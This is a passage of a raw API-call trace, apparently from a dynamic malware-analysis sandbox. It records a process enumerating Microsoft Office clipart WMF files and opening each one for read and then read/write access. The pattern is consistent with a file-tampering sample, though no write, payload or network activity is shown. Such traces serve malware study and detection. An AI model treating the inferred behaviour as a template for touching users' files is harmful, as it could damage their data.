hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.198] AreFileApisANSI () returned 1 [0102.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0102.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.199] AreFileApisANSI () returned 1 [0102.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 69 [0102.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.199] GetFileType (hFile=0x33c) returned 0x1 [0102.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.199] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.199] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.200] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.200] CloseHandle (hObject=0x33c) returned 1 [0102.200] AreFileApisANSI () returned 1 [0102.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 69 [0102.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.200] GetFileType (hFile=0x33c) returned 0x1 [0102.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.200] CloseHandle (hObject=0x33c) returned 1 [0102.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.202] AreFileApisANSI () returned 1 [0102.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 69 [0102.202] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08868_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d0e)) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0102.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.202] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbaaa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD09031_.WMF", cAlternateFileName="")) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0102.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0102.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0102.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.203] AreFileApisANSI () returned 1 [0102.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0102.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.203] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0102.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.203] AreFileApisANSI () returned 1 [0102.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0102.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 69 [0102.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.204] GetFileType (hFile=0x33c) returned 0x1 [0102.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0102.204] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.204] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.205] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.205] CloseHandle (hObject=0x33c) returned 1 [0102.209] AreFileApisANSI () returned 1 [0102.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0102.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 69 [0102.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.209] GetFileType (hFile=0x33c) returned 0x1 [0102.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0102.209] CloseHandle (hObject=0x33c) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.211] AreFileApisANSI () returned 1 [0102.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 69 [0102.211] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09031_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbaaa)) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0102.211] HeapFree (in: hHeap=0x20000, 